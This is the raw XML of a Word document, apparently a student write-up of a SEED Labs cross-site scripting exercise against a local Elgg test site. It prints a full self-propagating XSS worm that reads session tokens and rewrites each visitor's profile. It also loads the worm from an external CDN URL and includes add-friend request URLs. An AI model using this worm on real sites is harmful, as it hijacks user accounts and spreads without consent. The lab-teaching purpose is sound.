class="pl-s"&gt;"Host"&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt; &lt;span class="pl-s"&gt;"www.xsslabelgg.com"&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span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class="pl-v"&gt;Ajax&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;setRequestHeader&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;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  &lt;span class="pl-s"&gt;"Content-Type"&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;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  &lt;span class="pl-s"&gt;"application/x-www-form-urlencoded"&lt;/span&gt;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class="pl-kos"&gt;)&lt;/span&gt;&lt;span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  &lt;span class="pl-v"&gt;Ajax&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;send&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-s1"&gt;content&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;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17"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;span class="pl-kos"&gt;}&lt;/span&gt;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};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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259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2"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w" value="&lt;script type="text/javascript" id="worm"&gt; window.onload = function () { var headerTag = '&lt;script id="worm" type="text/javascript"&gt;'; var jsCode = document.getElementById("worm").innerHTML; var tailTag = "&lt;/" + "script&gt;"; var wormCode = encodeURIComponent(headerTag + jsCode + tailTag); //JavaScript code to access user name, user guid, Time Stamp __elgg_ts //and Security Token __elgg_token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var userName = &amp;quot;&amp;amp;name=&amp;quot; + elgg.session.user.name;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var guid = &amp;quot;&amp;amp;guid=&amp;quot; + elgg.session.user.guid;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var ts = &amp;quot;&amp;amp;__elgg_ts=&amp;quot; + elgg.security.token.__elgg_ts;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var token = &amp;quot;&amp;amp;__elgg_token=&amp;quot; + elgg.security.token.__elgg_token;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var description =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&amp;quot;&amp;amp;description=&lt;p&gt;modified by Samy&lt;p&gt;&amp;quot; +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wormCode +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&amp;quot;&amp;amp;accesslevel[description]=2&amp;quot;;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//Construct the content of your url.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var sendurl = &amp;quot;http://www.xsslabelgg.com/action/profile/edit&amp;quot;;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var content = userName + guid + ts + token + description;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var samyGuid = 47;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if (elgg.session.user.guid != samyGuid) {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//Create and send Ajax request to modify profile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var Ajax = null;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Ajax = new XMLHttpRequest();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Ajax.open(&amp;quot;POST&amp;quot;, sendurl, true);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Ajax.setRequestHeader(&amp;quot;Host&amp;quot;, &amp;quot;www.xsslabelgg.com&amp;quot;);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Ajax.setRequestHeader(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&amp;quot;Content-Type&amp;quot;,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  &amp;quot;application/x-www-form-urlencoded&amp;quot;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Ajax.send(content);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}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}; &lt;/script&gt; " tabindex="0" role="button"&gt;</w:t>
      </w:r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Edit Boby's profile as the code above. Then sign-in as Boby to view his profile page, as expected, Boby is injected and shows "modified by Samy". Log-out and then log-in as Alice to view Boby's profile, now you can found that Alice's profile is also changed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="36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36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36"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Link Approach</w:t>
      </w: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Write the JavaScript file </w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId38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FFFFFF" w:val="clear"/>
          </w:rPr>
          <w:t xml:space="preserve">xssworm.js</w:t>
        </w:r>
      </w:hyperlink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 and store it in the external link </w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId39">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:eastAsia="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:spacing w:val="0"/>
            <w:position w:val="0"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:rPr>
          <w:t xml:space="preserve">https://cdn.jsdelivr.net/gh/li-xin-yi/seedlab@latest/Cross-Site-Scripting-Attack/xssworm.js</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="240" w:line="240"/>
        <w:ind w:right="0" w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:eastAsia="Segoe UI"/>
          <w:color w:val="24292F"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Add it into Samy's profile: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&lt;script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type="text/javascript"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  src="https://cdn.jsdelivr.net/gh/li-xin-yi/seedlab@latest/Cross-Site-Scripting-Attack/xssworm.js"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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="24292F"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&lt;/script&gt;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Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:eastAsia="Segoe UI"/>
          <w:b/>
          <w:color w:val="4BACC6"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="36"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:eastAsia="Segoe UI"/>
          <w:b/>
          <w:color w:val="4BACC6"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="36"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Repository : 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Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:eastAsia="Segoe UI"/>
          <w:b/>
          <w:color w:val="24292F"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="36"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId40">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:eastAsia="Segoe UI"/>
            <w:b/>
            <w:color w:val="4BACC6"/>
            <w:spacing w:val="0"/>
            <w:position w:val="0"/>
            <w:sz w:val="36"/>
            <w:u w:val="single"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/mynameiszaid/Assignment-IS---Cross-Site-Scripting.docx</w:t>
        </w:r>
      </w:hyperlink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1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1.bin" Id="docRId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" /><Relationship Target="embeddings/oleObject4.bin" Id="docRId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" /><Relationship TargetMode="External" Target="http://www.xsslabelgg.com/action/profile/edit" Id="docRId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="http://www.xsslabelgg.com/" Id="docRId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship Target="embeddings/oleObject2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3.wmf" Id="docRId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" /><Relationship TargetMode="External" Target="http://www.xsslabelgg.com/action/friends/add?friend=47" Id="docRId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship Target="media/image5.wmf" Id="docRId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" /><Relationship TargetMode="External" Target="https://github.com/M-Umer-Hassan/cross-site-scripting/blob/main/README.md" Id="docRId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship Target="numbering.xml" Id="docRId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" /><Relationship Target="media/image1.wmf" Id="docRId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" /><Relationship TargetMode="External" Target="http://www.xsslabelgg.com/profile/alice" Id="docRId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="http://www.xsslabelgg.com/" Id="docRId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship Target="embeddings/oleObject5.bin" Id="docRId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" /><Relationship TargetMode="External" Target="http://www.xsslabelgg.com/" Id="docRId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="https://github.com/M-Umer-Hassan/cross-site-scripting/blob/main/README.md" Id="docRId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="https://github.com/mynameiszaid/Assignment-IS---Cross-Site-Scripting.docx" Id="docRId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship Target="media/image2.wmf" Id="docRId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" /><Relationship TargetMode="External" Target="http://www.xsslabelgg.com/profile/samy" Id="docRId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="http://www.xsslabelgg.com/" Id="docRId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="http://www.xsslabelgg.com/profile/alice/edit" Id="docRId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="http://www.xsslabelgg.com/action/profile/edit" Id="docRId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="https://github.com/M-Umer-Hassan/cross-site-scripting/blob/main/li-xin-yi/seedlab/blob/master/Cross-Site-Scripting-Attack/xssworm.js" Id="docRId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship Target="embeddings/oleObject3.bin" Id="docRId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" /><Relationship TargetMode="External" Target="http://www.xsslabelgg.com/action/friends/add?friend=47" Id="docRId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="http://www.xsslabelgg.com/" Id="docRId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="http://www.xsslabelgg.com/" Id="docRId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="https://cdn.jsdelivr.net/gh/li-xin-yi/seedlab@latest/Cross-Site-Scripting-Attack/xssworm.js" Id="docRId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship Target="styles.xml" Id="docRId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" /><Relationship TargetMode="External" Target="http://www.xsslabelgg.com/" Id="docRId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="http://www.xsslabelgg.com/action/friends/add?friend=47&amp;__elgg_ts=1589608177&amp;__elgg_token=VSvUwjnd17FwcB4BXzuRzQ&amp;__elgg_ts=1589608177&amp;__elgg_token=VSvUwjnd17FwcB4BXzuRzQ" Id="docRId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="http://www.xsslabelgg.com/profile/alice/edit" Id="docRId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship Target="embeddings/oleObject6.bin" Id="docRId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" /><Relationship TargetMode="External" Target="http://www.xsslabelgg.com/" Id="docRId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="http://www.xsslabelgg.com/" Id="docRId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="http://www.xsslabelgg.com/" Id="docRId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship Target="media/image6.wmf" Id="docRId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" /><Relationship TargetMode="External" Target="http://www.xsslabelgg.com/action/profile/edit" Id="docRId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="http://www.xsslabelgg.com/profile/alice" Id="docRId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship Target="media/image0.wmf" Id="docRId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" /><Relationship Target="media/image4.wmf" Id="docRId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" /><Relationship TargetMode="External" Target="http://www.xsslabelgg.com/" Id="docRId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /></Relationships>
</file>